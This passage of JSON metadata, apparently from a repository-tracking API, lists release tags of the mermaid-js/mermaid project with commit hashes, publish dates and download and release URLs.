3.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"h